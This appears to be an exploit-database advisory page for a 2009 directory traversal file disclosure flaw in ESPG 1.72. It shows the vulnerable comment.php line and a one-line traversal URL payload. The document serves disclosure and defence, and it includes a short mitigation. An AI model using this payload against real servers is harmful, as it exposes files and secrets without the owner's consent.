.::ESPG 1.72 File Disclosure Vulnerability::.

vendor:

ESPG

by:

bd0rk

7.5

CVSS

HIGH

File Disclosure Vulnerability

CWE

Product Name: ESPG

Affected Version From: 1.72

Affected Version To: 1.72

Patch Exists: NO

Related CWE: N/A

CPE: a:quirm.net:espg:1.72

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

.::ESPG 1.72 File Disclosure Vulnerability::.

ESPG (Enhanced Simple PHP Gallery) 1.72 is vulnerable to a file disclosure vulnerability. This vulnerability is due to an input validation error when handling user-supplied input. A remote attacker can exploit this vulnerability by sending a specially crafted HTTP request containing directory traversal characters to the vulnerable application. This can allow the attacker to view arbitrary files on the system, potentially resulting in the disclosure of sensitive information.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized. Additionally, access to the vulnerable application should be restricted to trusted users.

Source

Exploit-DB raw data:

                      .::ESPG 1.72 File Disclosure Vulnerability::.
 
 

 => Scriptname: ESPG (Enhanced Simple PHP Gallery) 1.72

 => Vendor: http://quirm.net
 
 => Download: http://quirm.net/download/21/

 => Bugfounder: bd0rk

 => Contact: bd0rk[at]hackermail.com

 => Greetings: str0ke, TheJT, Maria, Alucard, x0r_32

 => Vulnerable Code in comment.php line 3

            -------------------------

             $fileid = $_GET['file'];

            -------------------------



[+]Sploit: http://[t4rg3t]/gallery/comment.php?file=../../TARGETFILE.php


                  ###The 20 years old, german Hacker bd0rk###

    
                     => 'GAINST WAR IN ISRAEL AND GAZA!!! <=

# milw0rm.com [2009-01-18]